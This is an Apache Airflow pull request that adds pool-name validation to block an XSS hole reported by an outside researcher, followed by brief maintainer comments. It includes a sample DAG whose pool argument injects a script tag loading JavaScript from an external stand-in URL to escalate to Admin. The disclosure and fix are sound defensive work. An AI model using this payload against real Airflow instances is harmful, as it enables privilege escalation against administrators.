[v2-11-test] Add pool name validation to avoid XSS from the DAG file

[molcay]

This PR adds a validation for pool name for the operators.

An external researcher find the following XSS vulnerability in the composer-airflow repository.

Accepting the value of the pool name as a string without validation is causing the XSS vulnerability.
Users can inject a javascript file as a value to the pool argument and escalate their role as Admin by targeting the Admin users.

Sample DAG:

js_file_url = "https://example.com/exploit.js"
pool_name = """'><script src=\"""" + js_file_url + """\"></script>"""

with DAG(
    dag_id="my_dag",
) as dag:
    EmptyOperator(task_id="elevate", pool=pool_name)

In this PR, I use the validate_key method to validate the pool argument and from now on, we will give a DAG import error if the value of the pool argument is not valid.

I created this PR for Airflow 2.11, however the prior versions also suffer from this problem. I am not sure if we need to patch the problem for the previous versions as well.

---

Was generative AI tooling used to co-author this PR?

• Yes (please specify the tool below)

---

• Read the Pull Request Guidelines for more information. Note: commit author/co-author name and email in commits become permanently public when merged.
• For fundamental code changes, an Airflow Improvement Proposal (AIP) is needed.
• When adding dependency, check compliance with the ASF 3rd Party License Policy.
• For significant user-facing changes create newsfragment: {pr_number}.significant.rst or {issue_number}.significant.rst, in airflow-core/newsfragments.

[potiuk]

Can you please rebase it @molcay? We had some GitHub availability issues yesterday and this one will need rebase.

[potiuk]

Actually - it passed all tests, so we can merge it.